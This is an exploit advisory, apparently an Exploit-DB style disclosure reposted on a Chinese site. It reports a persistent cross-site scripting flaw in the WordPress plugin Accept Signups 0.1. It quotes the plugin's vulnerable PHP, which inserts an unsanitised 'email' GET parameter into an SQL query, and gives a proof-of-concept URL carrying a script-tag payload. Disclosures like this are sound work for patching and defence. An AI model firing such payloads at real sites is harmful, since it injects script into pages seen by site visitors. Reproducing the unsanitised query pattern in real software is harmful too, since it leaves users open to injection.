扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 |
# Exploit Title: WORDPRESS Plugin Accept Signups PERSISTENT XSS # Date:21/12/2010 # Author: clshack # Software Link:http://wordpress.org/extend/plugins/accept-signups/ # Version:0.1 # Tested on: wordpress 3.03 # CVE : Vulnerable code accept-signups_submit.php: require_once('../../../wp-config.php');//*addslashes* to GET and POST $e=$_GET['email']; function saveEmail($e) { global $wpdb; $tbl = '<code>' . DB_NAME . '</code>.<code>' . $wpdb->prefix . 'accept-signups</code>'; $q = "insert into " .$tbl . " (email, ip, timestamp) value ('$e', '". $_SERVER['REMOTE_ADDR'] . "', now());"; return $wpdb->query($wpdb->prepare($q)); } Poc: http://localhost/wordpress/*wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72, 101, 108, 108, 111, 32, 58, 68, 32))</script>* |
体验盒子
